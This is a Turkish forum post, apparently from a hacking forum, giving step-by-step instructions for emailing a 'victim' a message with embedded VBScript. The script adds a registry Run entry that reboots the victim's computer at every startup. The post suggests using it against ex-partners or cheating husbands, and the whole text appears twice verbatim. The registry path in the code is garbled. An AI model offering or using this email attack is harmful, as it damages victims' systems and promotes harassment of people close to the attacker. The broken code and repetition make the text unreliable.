- Konu Sahibi kalemkitap2
hotmailinize girin yeni msj yaratın kıme bolumune kurbanın adresını yazın..
konuya ilgi cekici bişi yazın
msj bolumune ıstedıgınız bır msjı yazın ve alttakı kodu ekleyın
KOD:
<script language="vbscript">
on error resume next
dim kutluk
set kutluk=CreateObject("WScript.Shell")
kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"
</script>
bu kod kurbanın maılı acmasıyla kodlar devreye gırecek ve sistem uyarısı gelecek tum uygulamalarınızı kapatın dıyecek
yanı pc her acıldıgında 24 sanıye ıcınde bir kapanacakKötü Kazen
BU TAMAMEN BİR ALINTIDIR.denemedim dahaKötü Kazen
başa bir sitede gezerken gördüm.yazan arkadaş açıklamasınıda yapmış
"""""""Kurban bir defa o maili açtıysa komut gereği 24 saniyede bir bilgisayar kapanacak.
kurbanın burda ilk olarak yapması gereken mail adresinden gelen maili silecek.
tabi kendi makinesinden silemez Çünkü kendisi bilgisayarı açıp bilgisayar kendine gelene kadar internete girmeyi söylemiyorum 24 saniye dolar zaten
kurban maili ancak başka bir pcden silebilir ama orda da açıp okumicak mail sayfasına girer girmez işaretleyim silecek.
ondan sonra kurban enson bilgisayarına güzelce bir format atacak..."""Kötü Kazen
eski sevgililer,aldatan kocalar için falan lazım olur belkiKötü Kazen
konuya ilgi cekici bişi yazın
msj bolumune ıstedıgınız bır msjı yazın ve alttakı kodu ekleyın
KOD:
<script language="vbscript">
on error resume next
dim kutluk
set kutluk=CreateObject("WScript.Shell")
kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"
</script>
bu kod kurbanın maılı acmasıyla kodlar devreye gırecek ve sistem uyarısı gelecek tum uygulamalarınızı kapatın dıyecek
yanı pc her acıldıgında 24 sanıye ıcınde bir kapanacakKötü Kazen
BU TAMAMEN BİR ALINTIDIR.denemedim dahaKötü Kazen
başa bir sitede gezerken gördüm.yazan arkadaş açıklamasınıda yapmış
"""""""Kurban bir defa o maili açtıysa komut gereği 24 saniyede bir bilgisayar kapanacak.
kurbanın burda ilk olarak yapması gereken mail adresinden gelen maili silecek.
tabi kendi makinesinden silemez Çünkü kendisi bilgisayarı açıp bilgisayar kendine gelene kadar internete girmeyi söylemiyorum 24 saniye dolar zaten
kurban maili ancak başka bir pcden silebilir ama orda da açıp okumicak mail sayfasına girer girmez işaretleyim silecek.
ondan sonra kurban enson bilgisayarına güzelce bir format atacak..."""Kötü Kazen
eski sevgililer,aldatan kocalar için falan lazım olur belkiKötü Kazen